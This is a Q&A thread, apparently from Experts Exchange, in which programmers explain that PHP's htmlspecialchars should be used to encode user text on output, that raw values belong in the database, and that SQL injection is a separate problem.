Why and when to use htmlentities and htmlspecialchars

Dear experts,

I know what htmlentites and htmlspecialchars do as in converting <, >, &, etc... into &lt, &gt etc..

I wish to know when to use these functions and shall I store conveted values such as &lt, &gt etc. into database?

Kinderly WadeprogrammerAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

Göran AnderssonCommented:
You should HTML encode bascially any text that you put in the HTML code, like text content in an element and values for attributes. Example:

<div class="<?php echo htmlspecialchars($divClass) ?>"><?php echo htmlspecialchars($divContent)?></div>

Open in new window

This applies of course to string that you don't have full control over yourself. If know that the string certainly can't contain anything that needs to be encoded, you naturally don't have to encode it.

Normally you would not store the text HTML encoded in the database, but rather encode it when you have fetched it from the database and want to display it in the page. HTML encoded text takes up more space in the database, and by HTML encoding it you would designate the data for being displayed in HTML. If you for example want to do a text search in the data, that becomes difficult or inefficient if it has HTML entities in it.
Ray PaseurCommented:
Do not store the converted values in the database.  Store the originals.

Use these functions whenever your script creates output from user input.  Typically this would be in the View component of the MVC design pattern.  The idea is to make stray and unwanted HTML and JavaScript into something that is safe for the client browsers.  If you do not do this, the client browser will run JavaScript when you send the JavaScript, and that may include doing some rather nasty things to the clients.
Kinderly WadeprogrammerAuthor Commented:
Hi experts,

If I don't store the converted value into database, what can I do to prevent a sql injection? I am trying to convert characters in away that can be safely stored into database with sql injection prevention. Thanks.
Ray PaseurCommented:
I think you're confusing SQL injection with the output-related issues associated with sending evil JavaScript to the browser.  SQL injection may occur when your script uses unfiltered external data in a query string.  But rather than have me repeat it all, here is a link to an authoritative source -- required reading if you are going to create a web site that faces the public!

See also: http://php.net/manual/en/security.php

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today

From novice to tech pro — start learning today.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.